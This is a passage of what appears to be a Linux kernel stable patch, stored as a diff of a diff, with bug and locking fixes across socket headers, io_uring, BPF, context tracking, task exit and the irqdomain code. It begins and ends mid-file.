+-/* Initialise core socket variables */
++/* Initialise core socket variables using an explicit uid. */
++void sock_init_data_uid(struct socket *sock, struct sock *sk, kuid_t uid);
++
++/* Initialise core socket variables.
++ * Assumes struct socket *sock is embedded in a struct socket_alloc.
++ */
+ void sock_init_data(struct socket *sock, struct sock *sk);
+ 
+ /*
+diff --git a/include/sound/hda_codec.h b/include/sound/hda_codec.h
+index eba23daf2c290..bbb7805e85d8e 100644
+--- a/include/sound/hda_codec.h
++++ b/include/sound/hda_codec.h
+@@ -259,6 +259,7 @@ struct hda_codec {
+ 	unsigned int relaxed_resume:1;	/* don't resume forcibly for jack */
+ 	unsigned int forced_resume:1; /* forced resume for jack */
+ 	unsigned int no_stream_clean_at_suspend:1; /* do not clean streams at suspend */
++	unsigned int ctl_dev_id:1; /* old control element id build behaviour */
+ 
+ #ifdef CONFIG_PM
+ 	unsigned long power_on_acct;
+diff --git a/include/sound/soc-dapm.h b/include/sound/soc-dapm.h
+index ebb8e7a7fc29e..9f2b1e6d858f7 100644
+--- a/include/sound/soc-dapm.h
++++ b/include/sound/soc-dapm.h
+@@ -16,6 +16,7 @@
+ #include <sound/asoc.h>
+ 
+ struct device;
++struct snd_pcm_substream;
+ struct snd_soc_pcm_runtime;
+ struct soc_enum;
+ 
+diff --git a/include/trace/events/devlink.h b/include/trace/events/devlink.h
+index 24969184c5348..77ff7cfc6049a 100644
+--- a/include/trace/events/devlink.h
++++ b/include/trace/events/devlink.h
+@@ -88,7 +88,7 @@ TRACE_EVENT(devlink_health_report,
+ 		__string(bus_name, devlink_to_dev(devlink)->bus->name)
+ 		__string(dev_name, dev_name(devlink_to_dev(devlink)))
+ 		__string(driver_name, devlink_to_dev(devlink)->driver->name)
+-		__string(reporter_name, msg)
++		__string(reporter_name, reporter_name)
+ 		__string(msg, msg)
+ 	),
+ 
+diff --git a/include/uapi/linux/io_uring.h b/include/uapi/linux/io_uring.h
+index 9d4c4078e8d00..9eff86acdfec4 100644
+--- a/include/uapi/linux/io_uring.h
++++ b/include/uapi/linux/io_uring.h
+@@ -617,7 +617,7 @@ struct io_uring_buf_ring {
+ 			__u16	resv3;
+ 			__u16	tail;
+ 		};
+-		struct io_uring_buf	bufs[0];
++		__DECLARE_FLEX_ARRAY(struct io_uring_buf, bufs);
+ 	};
+ };
+ 
+diff --git a/include/uapi/linux/vfio.h b/include/uapi/linux/vfio.h
+index d7d8e0922376c..4e8d3440f0470 100644
+--- a/include/uapi/linux/vfio.h
++++ b/include/uapi/linux/vfio.h
+@@ -49,7 +49,11 @@
+ /* Supports VFIO_DMA_UNMAP_FLAG_ALL */
+ #define VFIO_UNMAP_ALL			9
+ 
+-/* Supports the vaddr flag for DMA map and unmap */
++/*
++ * Supports the vaddr flag for DMA map and unmap.  Not supported for mediated
++ * devices, so this capability is subject to change as groups are added or
++ * removed.
++ */
+ #define VFIO_UPDATE_VADDR		10
+ 
+ /*
+@@ -1215,8 +1219,7 @@ struct vfio_iommu_type1_info_dma_avail {
+  * Map process virtual addresses to IO virtual addresses using the
+  * provided struct vfio_dma_map. Caller sets argsz. READ &/ WRITE required.
+  *
+- * If flags & VFIO_DMA_MAP_FLAG_VADDR, update the base vaddr for iova, and
+- * unblock translation of host virtual addresses in the iova range.  The vaddr
++ * If flags & VFIO_DMA_MAP_FLAG_VADDR, update the base vaddr for iova. The vaddr
+  * must have previously been invalidated with VFIO_DMA_UNMAP_FLAG_VADDR.  To
+  * maintain memory consistency within the user application, the updated vaddr
+  * must address the same memory object as originally mapped.  Failure to do so
+@@ -1267,9 +1270,9 @@ struct vfio_bitmap {
+  * must be 0.  This cannot be combined with the get-dirty-bitmap flag.
+  *
+  * If flags & VFIO_DMA_UNMAP_FLAG_VADDR, do not unmap, but invalidate host
+- * virtual addresses in the iova range.  Tasks that attempt to translate an
+- * iova's vaddr will block.  DMA to already-mapped pages continues.  This
+- * cannot be combined with the get-dirty-bitmap flag.
++ * virtual addresses in the iova range.  DMA to already-mapped pages continues.
++ * Groups may not be added to the container while any addresses are invalid.
++ * This cannot be combined with the get-dirty-bitmap flag.
+  */
+ struct vfio_iommu_type1_dma_unmap {
+ 	__u32	argsz;
+diff --git a/include/ufs/ufshcd.h b/include/ufs/ufshcd.h
+index 2bb89290da63c..b54f22840dabf 100644
+--- a/include/ufs/ufshcd.h
++++ b/include/ufs/ufshcd.h
+@@ -566,9 +566,9 @@ enum ufshcd_quirks {
+ 	UFSHCD_QUIRK_SKIP_DEF_UNIPRO_TIMEOUT_SETTING = 1 << 13,
+ 
+ 	/*
+-	 * This quirk allows only sg entries aligned with page size.
++	 * Align DMA SG entries on a 4 KiB boundary.
+ 	 */
+-	UFSHCD_QUIRK_ALIGN_SG_WITH_PAGE_SIZE		= 1 << 14,
++	UFSHCD_QUIRK_4KB_DMA_ALIGNMENT			= 1 << 14,
+ 
+ 	/*
+ 	 * This quirk needs to be enabled if the host controller does not
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 862e05e6691de..ce4969d3e20de 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1030,10 +1030,16 @@ static unsigned int handle_tw_list(struct llist_node *node,
+ 			/* if not contended, grab and improve batching */
+ 			*locked = mutex_trylock(&(*ctx)->uring_lock);
+ 			percpu_ref_get(&(*ctx)->refs);
+-		}
++		} else if (!*locked)
++			*locked = mutex_trylock(&(*ctx)->uring_lock);
+ 		req->io_task_work.func(req, locked);
+ 		node = next;
+ 		count++;
++		if (unlikely(need_resched())) {
++			ctx_flush_and_put(*ctx, locked);
++			*ctx = NULL;
++			cond_resched();
++		}
+ 	}
+ 
+ 	return count;
+@@ -1591,7 +1597,7 @@ int io_req_prep_async(struct io_kiocb *req)
+ 	const struct io_op_def *def = &io_op_defs[req->opcode];
+ 
+ 	/* assign early for deferred execution for non-fixed file */
+-	if (def->needs_file && !(req->flags & REQ_F_FIXED_FILE))
++	if (def->needs_file && !(req->flags & REQ_F_FIXED_FILE) && !req->file)
+ 		req->file = io_file_get_normal(req, req->cqe.fd);
+ 	if (!def->prep_async)
+ 		return 0;
+@@ -2653,7 +2659,7 @@ static __poll_t io_uring_poll(struct file *file, poll_table *wait)
+ 	 * pushs them to do the flush.
+ 	 */
+ 
+-	if (io_cqring_events(ctx) || io_has_work(ctx))
++	if (__io_cqring_events_user(ctx) || io_has_work(ctx))
+ 		mask |= EPOLLIN | EPOLLRDNORM;
+ 
+ 	return mask;
+@@ -2912,6 +2918,7 @@ static __cold bool io_uring_try_cancel_requests(struct io_ring_ctx *ctx,
+ 		while (!wq_list_empty(&ctx->iopoll_list)) {
+ 			io_iopoll_try_reap_events(ctx);
+ 			ret = true;
++			cond_resched();
+ 		}
+ 	}
+ 
+diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
+index 90b675c65b840..019600570ee49 100644
+--- a/io_uring/io_uring.h
++++ b/io_uring/io_uring.h
+@@ -3,6 +3,7 @@
+ 
+ #include <linux/errno.h>
+ #include <linux/lockdep.h>
++#include <linux/resume_user_mode.h>
+ #include <linux/io_uring_types.h>
+ #include <uapi/linux/eventpoll.h>
+ #include "io-wq.h"
+@@ -255,6 +256,15 @@ static inline int io_run_task_work(void)
+ 	 */
+ 	if (test_thread_flag(TIF_NOTIFY_SIGNAL))
+ 		clear_notify_signal();
++	/*
++	 * PF_IO_WORKER never returns to userspace, so check here if we have
++	 * notify work that needs processing.
++	 */
++	if (current->flags & PF_IO_WORKER &&
++	    test_thread_flag(TIF_NOTIFY_RESUME)) {
++		__set_current_state(TASK_RUNNING);
++		resume_user_mode_work(NULL);
++	}
+ 	if (task_work_pending(current)) {
+ 		__set_current_state(TASK_RUNNING);
+ 		task_work_run();
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 520a73b5a4483..55d822beaf084 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -553,7 +553,7 @@ int io_recvmsg_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 	sr->flags = READ_ONCE(sqe->ioprio);
+ 	if (sr->flags & ~(RECVMSG_FLAGS))
+ 		return -EINVAL;
+-	sr->msg_flags = READ_ONCE(sqe->msg_flags) | MSG_NOSIGNAL;
++	sr->msg_flags = READ_ONCE(sqe->msg_flags);
+ 	if (sr->msg_flags & MSG_DONTWAIT)
+ 		req->flags |= REQ_F_NOWAIT;
+ 	if (sr->msg_flags & MSG_ERRQUEUE)
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 55d4ab96fb925..185d5dfb7d569 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -1147,14 +1147,17 @@ struct page **io_pin_pages(unsigned long ubuf, unsigned long len, int *npages)
+ 	pret = pin_user_pages(ubuf, nr_pages, FOLL_WRITE | FOLL_LONGTERM,
+ 			      pages, vmas);
+ 	if (pret == nr_pages) {
++		struct file *file = vmas[0]->vm_file;
++
+ 		/* don't support file backed memory */
+ 		for (i = 0; i < nr_pages; i++) {
+-			struct vm_area_struct *vma = vmas[i];
+-
+-			if (vma_is_shmem(vma))
++			if (vmas[i]->vm_file != file) {
++				ret = -EINVAL;
++				break;
++			}
++			if (!file)
+ 				continue;
+-			if (vma->vm_file &&
+-			    !is_file_hugepages(vma->vm_file)) {
++			if (!vma_is_shmem(vmas[i]) && !is_file_hugepages(file)) {
+ 				ret = -EOPNOTSUPP;
+ 				break;
+ 			}
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index a7c2f0c3fc19c..7fcbe5d002070 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -5131,6 +5131,7 @@ btf_get_prog_ctx_type(struct bpf_verifier_log *log, const struct btf *btf,
+ 	if (!ctx_struct)
+ 		/* should not happen */
+ 		return NULL;
++again:
+ 	ctx_tname = btf_name_by_offset(btf_vmlinux, ctx_struct->name_off);
+ 	if (!ctx_tname) {
+ 		/* should not happen */
+@@ -5144,8 +5145,16 @@ btf_get_prog_ctx_type(struct bpf_verifier_log *log, const struct btf *btf,
+ 	 * int socket_filter_bpf_prog(struct __sk_buff *skb)
+ 	 * { // no fields of skb are ever used }
+ 	 */
+-	if (strcmp(ctx_tname, tname))
+-		return NULL;
++	if (strcmp(ctx_tname, tname)) {
++		/* bpf_user_pt_regs_t is a typedef, so resolve it to
++		 * underlying struct and check name again
++		 */
++		if (!btf_type_is_modifier(ctx_struct))
++			return NULL;
++		while (btf_type_is_modifier(ctx_struct))
++			ctx_struct = btf_type_by_id(btf_vmlinux, ctx_struct->type);
++		goto again;
++	}
+ 	return ctx_type;
+ }
+ 
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index c4811984fafa4..4a3d0a7447026 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -1010,8 +1010,6 @@ static struct htab_elem *alloc_htab_elem(struct bpf_htab *htab, void *key,
+ 			l_new = ERR_PTR(-ENOMEM);
+ 			goto dec_count;
+ 		}
+-		check_and_init_map_value(&htab->map,
+-					 l_new->key + round_up(key_size, 8));
+ 	}
+ 
+ 	memcpy(l_new->key, key, key_size);
+@@ -1603,6 +1601,7 @@ static int __htab_map_lookup_and_delete_elem(struct bpf_map *map, void *key,
+ 			else
+ 				copy_map_value(map, value, l->key +
+ 					       roundup_key_size);
++			/* Zeroing special fields in the temp buffer */
+ 			check_and_init_map_value(map, value);
+ 		}
+ 
+@@ -1803,6 +1802,7 @@ again_nocopy:
+ 						      true);
+ 			else
+ 				copy_map_value(map, dst_val, value);
++			/* Zeroing special fields in the temp buffer */
+ 			check_and_init_map_value(map, dst_val);
+ 		}
+ 		if (do_delete) {
+diff --git a/kernel/bpf/memalloc.c b/kernel/bpf/memalloc.c
+index 6187c28d266f0..ace303a220ae8 100644
+--- a/kernel/bpf/memalloc.c
++++ b/kernel/bpf/memalloc.c
+@@ -143,7 +143,7 @@ static void *__alloc(struct bpf_mem_cache *c, int node)
+ 		return obj;
+ 	}
+ 
+-	return kmalloc_node(c->unit_size, flags, node);
++	return kmalloc_node(c->unit_size, flags | __GFP_ZERO, node);
+ }
+ 
+ static struct mem_cgroup *get_memcg(const struct bpf_mem_cache *c)
+diff --git a/kernel/context_tracking.c b/kernel/context_tracking.c
+index 77978e3723771..a09f1c19336ae 100644
+--- a/kernel/context_tracking.c
++++ b/kernel/context_tracking.c
+@@ -510,7 +510,7 @@ void noinstr __ct_user_enter(enum ctx_state state)
+ 			 * In this we case we don't care about any concurrency/ordering.
+ 			 */
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE))
+-				atomic_set(&ct->state, state);
++				arch_atomic_set(&ct->state, state);
+ 		} else {
+ 			/*
+ 			 * Even if context tracking is disabled on this CPU, because it's outside
+@@ -527,7 +527,7 @@ void noinstr __ct_user_enter(enum ctx_state state)
+ 			 */
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE)) {
+ 				/* Tracking for vtime only, no concurrent RCU EQS accounting */
+-				atomic_set(&ct->state, state);
++				arch_atomic_set(&ct->state, state);
+ 			} else {
+ 				/*
+ 				 * Tracking for vtime and RCU EQS. Make sure we don't race
+@@ -535,7 +535,7 @@ void noinstr __ct_user_enter(enum ctx_state state)
+ 				 * RCU only requires RCU_DYNTICKS_IDX increments to be fully
+ 				 * ordered.
+ 				 */
+-				atomic_add(state, &ct->state);
++				arch_atomic_add(state, &ct->state);
+ 			}
+ 		}
+ 	}
+@@ -630,12 +630,12 @@ void noinstr __ct_user_exit(enum ctx_state state)
+ 			 * In this we case we don't care about any concurrency/ordering.
+ 			 */
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE))
+-				atomic_set(&ct->state, CONTEXT_KERNEL);
++				arch_atomic_set(&ct->state, CONTEXT_KERNEL);
+ 
+ 		} else {
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE)) {
+ 				/* Tracking for vtime only, no concurrent RCU EQS accounting */
+-				atomic_set(&ct->state, CONTEXT_KERNEL);
++				arch_atomic_set(&ct->state, CONTEXT_KERNEL);
+ 			} else {
+ 				/*
+ 				 * Tracking for vtime and RCU EQS. Make sure we don't race
+@@ -643,7 +643,7 @@ void noinstr __ct_user_exit(enum ctx_state state)
+ 				 * RCU only requires RCU_DYNTICKS_IDX increments to be fully
+ 				 * ordered.
+ 				 */
+-				atomic_sub(state, &ct->state);
++				arch_atomic_sub(state, &ct->state);
+ 			}
+ 		}
+ 	}
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 15dc2ec80c467..bccfa4218356e 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -807,6 +807,8 @@ void __noreturn do_exit(long code)
+ 	struct task_struct *tsk = current;
+ 	int group_dead;
+ 
++	WARN_ON(irqs_disabled());
++
+ 	synchronize_group_exit(tsk, code);
+ 
+ 	WARN_ON(tsk->plug);
+@@ -938,6 +940,11 @@ void __noreturn make_task_dead(int signr)
+ 	if (unlikely(!tsk->pid))
+ 		panic("Attempted to kill the idle task!");
+ 
++	if (unlikely(irqs_disabled())) {
++		pr_info("note: %s[%d] exited with irqs disabled\n",
++			current->comm, task_pid_nr(current));
++		local_irq_enable();
++	}
+ 	if (unlikely(in_atomic())) {
+ 		pr_info("note: %s[%d] exited with preempt_count %d\n",
+ 			current->comm, task_pid_nr(current),
+diff --git a/kernel/irq/irqdomain.c b/kernel/irq/irqdomain.c
+index e2096b51c0047..607c0c3d3f5e1 100644
+--- a/kernel/irq/irqdomain.c
++++ b/kernel/irq/irqdomain.c
+@@ -25,6 +25,9 @@ static DEFINE_MUTEX(irq_domain_mutex);
+ 
+ static struct irq_domain *irq_default_domain;
+ 
++static int irq_domain_alloc_irqs_locked(struct irq_domain *domain, int irq_base,
++					unsigned int nr_irqs, int node, void *arg,
++					bool realloc, const struct irq_affinity_desc *affinity);
+ static void irq_domain_check_hierarchy(struct irq_domain *domain);
+ 
+ struct irqchip_fwid {
+@@ -123,23 +126,12 @@ void irq_domain_free_fwnode(struct fwnode_handle *fwnode)
+ }
+ EXPORT_SYMBOL_GPL(irq_domain_free_fwnode);
+ 
+-/**
+- * __irq_domain_add() - Allocate a new irq_domain data structure
+- * @fwnode: firmware node for the interrupt controller
+- * @size: Size of linear map; 0 for radix mapping only
+- * @hwirq_max: Maximum number of interrupts supported by controller
+- * @direct_max: Maximum value of direct maps; Use ~0 for no limit; 0 for no
+- *              direct mapping
+- * @ops: domain callbacks
+- * @host_data: Controller private data pointer
+- *
+- * Allocates and initializes an irq_domain structure.
+- * Returns pointer to IRQ domain, or NULL on failure.
+- */
+-struct irq_domain *__irq_domain_add(struct fwnode_handle *fwnode, unsigned int size,
+-				    irq_hw_number_t hwirq_max, int direct_max,
+-				    const struct irq_domain_ops *ops,
+-				    void *host_data)
++static struct irq_domain *__irq_domain_create(struct fwnode_handle *fwnode,
++					      unsigned int size,
++					      irq_hw_number_t hwirq_max,
++					      int direct_max,
++					      const struct irq_domain_ops *ops,
++					      void *host_data)
+ {
+ 	struct irqchip_fwid *fwid;
+ 	struct irq_domain *domain;
+@@ -227,12 +219,44 @@ struct irq_domain *__irq_domain_add(struct fwnode_handle *fwnode, unsigned int s
+ 
+ 	irq_domain_check_hierarchy(domain);
+ 
++	return domain;
++}
++
++static void __irq_domain_publish(struct irq_domain *domain)
++{
+ 	mutex_lock(&irq_domain_mutex);
+ 	debugfs_add_domain_dir(domain);
+ 	list_add(&domain->link, &irq_domain_list);
+ 	mutex_unlock(&irq_domain_mutex);
+ 
+ 	pr_debug("Added domain %s\n", domain->name);
++}
++
++/**
++ * __irq_domain_add() - Allocate a new irq_domain data structure
++ * @fwnode: firmware node for the interrupt controller
++ * @size: Size of linear map; 0 for radix mapping only
++ * @hwirq_max: Maximum number of interrupts supported by controller
++ * @direct_max: Maximum value of direct maps; Use ~0 for no limit; 0 for no
++ *              direct mapping
++ * @ops: domain callbacks
++ * @host_data: Controller private data pointer
++ *
++ * Allocates and initializes an irq_domain structure.
++ * Returns pointer to IRQ domain, or NULL on failure.
++ */
++struct irq_domain *__irq_domain_add(struct fwnode_handle *fwnode, unsigned int size,
++				    irq_hw_number_t hwirq_max, int direct_max,
++				    const struct irq_domain_ops *ops,
++				    void *host_data)
++{
++	struct irq_domain *domain;
++
++	domain = __irq_domain_create(fwnode, size, hwirq_max, direct_max,
++				     ops, host_data);
++	if (domain)
++		__irq_domain_publish(domain);
++
+ 	return domain;
+ }
+ EXPORT_SYMBOL_GPL(__irq_domain_add);
+@@ -538,6 +562,9 @@ static void irq_domain_disassociate(struct irq_domain *domain, unsigned int irq)
+ 		return;
+ 
+ 	hwirq = irq_data->hwirq;
++
++	mutex_lock(&irq_domain_mutex);
++
+ 	irq_set_status_flags(irq, IRQ_NOREQUEST);
+ 
+ 	/* remove chip and handler */
+@@ -557,10 +584,12 @@ static void irq_domain_disassociate(struct irq_domain *domain, unsigned int irq)
+ 
+ 	/* Clear reverse map for this hwirq */
+ 	irq_domain_clear_mapping(domain, hwirq);
++
++	mutex_unlock(&irq_domain_mutex);
+ }
+ 
+-int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+-			 irq_hw_number_t hwirq)
++static int irq_domain_associate_locked(struct irq_domain *domain, unsigned int virq,
++				       irq_hw_number_t hwirq)
+ {
+ 	struct irq_data *irq_data = irq_get_irq_data(virq);
+ 	int ret;
+@@ -573,7 +602,6 @@ int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+ 	if (WARN(irq_data->domain, "error: virq%i is already associated", virq))
+ 		return -EINVAL;
+ 
+-	mutex_lock(&irq_domain_mutex);
+ 	irq_data->hwirq = hwirq;
+ 	irq_data->domain = domain;
+ 	if (domain->ops->map) {
+@@ -590,7 +618,6 @@ int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+ 			}
+ 			irq_data->domain = NULL;
+ 			irq_data->hwirq = 0;
+-			mutex_unlock(&irq_domain_mutex);
+ 			return ret;
+ 		}
+ 
+@@ -601,12 +628,23 @@ int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+ 
+ 	domain->mapcount++;
+ 	irq_domain_set_mapping(domain, hwirq, irq_data);
+-	mutex_unlock(&irq_domain_mutex);
+ 
+ 	irq_clear_status_flags(virq, IRQ_NOREQUEST);
+ 
+ 	return 0;
+ }
++
++int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
++			 irq_hw_number_t hwirq)
++{
++	int ret;
++
++	mutex_lock(&irq_domain_mutex);
++	ret = irq_domain_associate_locked(domain, virq, hwirq);
++	mutex_unlock(&irq_domain_mutex);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(irq_domain_associate);
+ 
+ void irq_domain_associate_many(struct irq_domain *domain, unsigned int irq_base,
+@@ -668,6 +706,34 @@ unsigned int irq_create_direct_mapping(struct irq_domain *domain)
+ EXPORT_SYMBOL_GPL(irq_create_direct_mapping);
+ #endif
+ 
++static unsigned int irq_create_mapping_affinity_locked(struct irq_domain *domain,
++						       irq_hw_number_t hwirq,
++						       const struct irq_affinity_desc *affinity)
++{
++	struct device_node *of_node = irq_domain_get_of_node(domain);
++	int virq;
++
++	pr_debug("irq_create_mapping(0x%p, 0x%lx)\n", domain, hwirq);
++
++	/* Allocate a virtual interrupt number */
++	virq = irq_domain_alloc_descs(-1, 1, hwirq, of_node_to_nid(of_node),
++				      affinity);
++	if (virq <= 0) {
++		pr_debug("-> virq allocation failed\n");
++		return 0;
++	}
++
++	if (irq_domain_associate_locked(domain, virq, hwirq)) {
++		irq_free_desc(virq);
++		return 0;
++	}
++
++	pr_debug("irq %lu on domain %s mapped to virtual irq %u\n",
++		hwirq, of_node_full_name(of_node), virq);
++
++	return virq;
++}
++
+ /**
+  * irq_create_mapping_affinity() - Map a hardware interrupt into linux irq space
+  * @domain: domain owning this hardware interrupt or NULL for default domain
+@@ -680,14 +746,11 @@ EXPORT_SYMBOL_GPL(irq_create_direct_mapping);
+  * on the number returned from that call.
+  */
+ unsigned int irq_create_mapping_affinity(struct irq_domain *domain,
+-				       irq_hw_number_t hwirq,
+-				       const struct irq_affinity_desc *affinity)
++					 irq_hw_number_t hwirq,
++					 const struct irq_affinity_desc *affinity)
+ {
+-	struct device_node *of_node;
+ 	int virq;
+ 
+-	pr_debug("irq_create_mapping(0x%p, 0x%lx)\n", domain, hwirq);
+-
+ 	/* Look for default domain if necessary */
+ 	if (domain == NULL)
+ 		domain = irq_default_domain;
+@@ -695,32 +758,19 @@ unsigned int irq_create_mapping_affinity(struct irq_domain *domain,
+ 		WARN(1, "%s(, %lx) called with NULL domain\n", __func__, hwirq);
+ 		return 0;
+ 	}
+-	pr_debug("-> using domain @%p\n", domain);
+ 
+-	of_node = irq_domain_get_of_node(domain);
++	mutex_lock(&irq_domain_mutex);
+ 
+ 	/* Check if mapping already exists */
+ 	virq = irq_find_mapping(domain, hwirq);
+ 	if (virq) {
+-		pr_debug("-> existing mapping on virq %d\n", virq);
+-		return virq;
+-	}
+-
+-	/* Allocate a virtual interrupt number */
+-	virq = irq_domain_alloc_descs(-1, 1, hwirq, of_node_to_nid(of_node),
+-				      affinity);
+-	if (virq <= 0) {
+-		pr_debug("-> virq allocation failed\n");
+-		return 0;
++		pr_debug("existing mapping on virq %d\n", virq);
++		goto out;
+ 	}
+ 
+-	if (irq_domain_associate(domain, virq, hwirq)) {
+-		irq_free_desc(virq);
+-		return 0;
+-	}
+-
+-	pr_debug("irq %lu on domain %s mapped to virtual irq %u\n",
+-		hwirq, of_node_full_name(of_node), virq);
++	virq = irq_create_mapping_affinity_locked(domain, hwirq, affinity);
++out:
++	mutex_unlock(&irq_domain_mutex);
+ 
+ 	return virq;
+ }
+@@ -789,6 +839,8 @@ unsigned int irq_create_fwspec_mapping(struct irq_fwspec *fwspec)
+ 	if (WARN_ON(type & ~IRQ_TYPE_SENSE_MASK))
+ 		type &= IRQ_TYPE_SENSE_MASK;
+ 
++	mutex_lock(&irq_domain_mutex);
++
+ 	/*
+ 	 * If we've already configured this interrupt,
+ 	 * don't do it again, or hell will break loose.
+@@ -801,7 +853,7 @@ unsigned int irq_create_fwspec_mapping(struct irq_fwspec *fwspec)
+ 		 * interrupt number.
+ 		 */
+ 		if (type == IRQ_TYPE_NONE || type == irq_get_trigger_type(virq))
+-			return virq;
++			goto out;
+ 
+ 		/*
+ 		 * If the trigger type has not been set yet, then set
+@@ -809,40 +861,45 @@ unsigned int irq_create_fwspec_mapping(struct irq_fwspec *fwspec)
+ 		 */
+ 		if (irq_get_trigger_type(virq) == IRQ_TYPE_NONE) {
+ 			irq_data = irq_get_irq_data(virq);
+-			if (!irq_data)
+-				return 0;
++			if (!irq_data) {
++				virq = 0;
++				goto out;
++			}
+ 
+ 			irqd_set_trigger_type(irq_data, type);
+-			return virq;
++			goto out;
+ 		}
+ 
+ 		pr_warn("type mismatch, failed to map hwirq-%lu for %s!\n",
+ 			hwirq, of_node_full_name(to_of_node(fwspec->fwnode)));
+-		return 0;
++		virq = 0;
++		goto out;
+ 	}
+ 
+ 	if (irq_domain_is_hierarchy(domain)) {
+-		virq = irq_domain_alloc_irqs(domain, 1, NUMA_NO_NODE, fwspec);
+-		if (virq <= 0)
+-			return 0;
++		virq = irq_domain_alloc_irqs_locked(domain, -1, 1, NUMA_NO_NODE,
++						    fwspec, false, NULL);
++		if (virq <= 0) {
++			virq = 0;
++			goto out;
++		}
+ 	} else {
+ 		/* Create mapping */
+-		virq = irq_create_mapping(domain, hwirq);
++		virq = irq_create_mapping_affinity_locked(domain, hwirq, NULL);
+ 		if (!virq)
+-			return virq;
++			goto out;
+ 	}
+ 
+ 	irq_data = irq_get_irq_data(virq);
+-	if (!irq_data) {
+-		if (irq_domain_is_hierarchy(domain))
+-			irq_domain_free_irqs(virq, 1);
+-		else
+-			irq_dispose_mapping(virq);
+-		return 0;
++	if (WARN_ON(!irq_data)) {
++		virq = 0;
++		goto out;
+ 	}
+ 
+ 	/* Store trigger type */
+ 	irqd_set_trigger_type(irq_data, type);
++out:
++	mutex_unlock(&irq_domain_mutex);
+ 
+ 	return virq;
+ }
+@@ -1102,12 +1159,15 @@ struct irq_domain *irq_domain_create_hierarchy(struct irq_domain *parent,
+ 	struct irq_domain *domain;
+ 
+ 	if (size)
+-		domain = irq_domain_create_linear(fwnode, size, ops, host_data);
++		domain = __irq_domain_create(fwnode, size, size, 0, ops, host_data);
+ 	else
+-		domain = irq_domain_create_tree(fwnode, ops, host_data);
++		domain = __irq_domain_create(fwnode, 0, ~0, 0, ops, host_data);
++
+ 	if (domain) {
+ 		domain->parent = parent;
+ 		domain->flags |= flags;
++
++		__irq_domain_publish(domain);
+ 	}
+ 
+ 	return domain;
+@@ -1426,40 +1486,12 @@ int irq_domain_alloc_irqs_hierarchy(struct irq_domain *domain,
+ 	return domain->ops->alloc(domain, irq_base, nr_irqs, arg);
+ }
+ 
+-/**
+- * __irq_domain_alloc_irqs - Allocate IRQs from domain
+- * @domain:	domain to allocate from
+- * @irq_base:	allocate specified IRQ number if irq_base >= 0
+- * @nr_irqs:	number of IRQs to allocate
+- * @node:	NUMA node id for memory allocation
+- * @arg:	domain specific argument
+- * @realloc:	IRQ descriptors have already been allocated if true
+- * @affinity:	Optional irq affinity mask for multiqueue devices
+- *
+- * Allocate IRQ numbers and initialized all data structures to support
+- * hierarchy IRQ domains.
+- * Parameter @realloc is mainly to support legacy IRQs.
+- * Returns error code or allocated IRQ number
+- *
+- * The whole process to setup an IRQ has been split into two steps.
+- * The first step, __irq_domain_alloc_irqs(), is to allocate IRQ
+- * descriptor and required hardware resources. The second step,
+- * irq_domain_activate_irq(), is to program the hardware with preallocated
+- * resources. In this way, it's easier to rollback when failing to
+- * allocate resources.
+- */
+-int __irq_domain_alloc_irqs(struct irq_domain *domain, int irq_base,
+-			    unsigned int nr_irqs, int node, void *arg,
+-			    bool realloc, const struct irq_affinity_desc *affinity)
++static int irq_domain_alloc_irqs_locked(struct irq_domain *domain, int irq_base,
++					unsigned int nr_irqs, int node, void *arg,
++					bool realloc, const struct irq_affinity_desc *affinity)
+ {
+ 	int i, ret, virq;
+ 
+-	if (domain == NULL) {
+-		domain = irq_default_domain;
+-		if (WARN(!domain, "domain is NULL; cannot allocate IRQ\n"))
+-			return -EINVAL;
+-	}
+-
+ 	if (realloc && irq_base >= 0) {
+ 		virq = irq_base;
+ 	} else {
+@@ -1478,24 +1510,18 @@ int __irq_domain_alloc_irqs(struct irq_domain *domain, int irq_base,
+ 		goto out_free_desc;
+ 	}
+ 
+-	mutex_lock(&irq_domain_mutex);
+ 	ret = irq_domain_alloc_irqs_hierarchy(domain, virq, nr_irqs, arg);
+-	if (ret < 0) {
+-		mutex_unlock(&irq_domain_mutex);
++	if (ret < 0)
+ 		goto out_free_irq_data;
+-	}
+ 
+ 	for (i = 0; i < nr_irqs; i++) {
+ 		ret = irq_domain_trim_hierarchy(virq + i);
+-		if (ret) {
+-			mutex_unlock(&irq_domain_mutex);
++		if (ret)
+ 			goto out_free_irq_data;
+-		}
+ 	}
+-	
++
+ 	for (i = 0; i < nr_irqs; i++)
+ 		irq_domain_insert_irq(virq + i);
+-	mutex_unlock(&irq_domain_mutex);
+ 
+ 	return virq;
+ 
+@@ -1505,6 +1531,48 @@ out_free_desc:
+ 	irq_free_descs(virq, nr_irqs);
+ 	return ret;
+ }
++
++/**
++ * __irq_domain_alloc_irqs - Allocate IRQs from domain
++ * @domain:	domain to allocate from
++ * @irq_base:	allocate specified IRQ number if irq_base >= 0
++ * @nr_irqs:	number of IRQs to allocate
++ * @node:	NUMA node id for memory allocation
++ * @arg:	domain specific argument
++ * @realloc:	IRQ descriptors have already been allocated if true
